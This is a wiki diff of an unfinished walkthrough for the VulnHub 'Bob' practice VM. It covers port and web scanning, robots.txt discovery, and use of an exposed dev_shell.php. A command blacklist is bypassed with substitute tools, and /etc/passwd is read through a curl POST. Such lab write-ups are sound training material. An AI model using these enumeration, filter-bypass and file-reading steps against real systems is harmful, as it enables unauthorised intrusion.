Difference between revisions of "Bob: 1.0.1 ~ Vulnhub - Walkthrough"
m (→Methodology) |
m (→Entry Point #1 - Port 80 (HTTP)) |
||
Line 49: | Line 49: | ||
+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds) | + End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds) | ||
--------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Let's take a closer look at that robots.txt | ||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | root@kali:~# curl http://$TANGO/robots.txt | ||
+ | User-agent: * | ||
+ | Disallow: /login.php | ||
+ | Disallow: /dev_shell.php | ||
+ | Disallow: /lat_memo.html | ||
+ | Disallow: /passwords.html | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | '''dev_shell.php''' sounds very promising. Dive dive dive! | ||
+ | |||
+ | After good 30 mins of poking it appeared there is some sort of ''blaklist'' - commands like '''ls''', '''pwd''', '''cat''', '''nc''' are being blocked. Nothing we can't work around though - all we had to do is to replace '''ls''' with '''find''', '''echo''', '''dir''', and '''cat''' with '''strings''' (see [[ Exploiting web shells - working your way around blacklisted commands ]] for more sweet workarounds). | ||
+ | |||
+ | Let's see what we have! | ||
+ | <syntaxhighlight lang=shell-session highlight="3,4,5,6" line> | ||
+ | root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php | ||
+ | ... | ||
+ | c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash | ||
+ | bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash | ||
+ | jc:x:1002:1002:James C,,,:/home/jc:/bin/bash | ||
+ | seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash | ||
+ | elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash | ||
+ | sshd:x:116:65534::/run/sshd:/usr/sbin/nologin | ||
+ | proftpd:x:117:65534::/run/proftpd:/bin/false | ||
+ | ftp:x:118:65534::/srv/ftp:/bin/false | ||
+ | ... | ||
</syntaxhighlight> | </syntaxhighlight> |
Revision as of 06:40, 31 May 2018
Contents
Objective
Get the flag in /
Source: [VulnHub.com]
Status: [In Progress]
Methodology
Define our target
root@kali:# export TANGO=192.168.56.101
Discovery
root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
Let's take a closer look at that robots.txt
root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
dev_shell.php sounds very promising. Dive dive dive!
After good 30 mins of poking it appeared there is some sort of blaklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
Let's see what we have!
root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...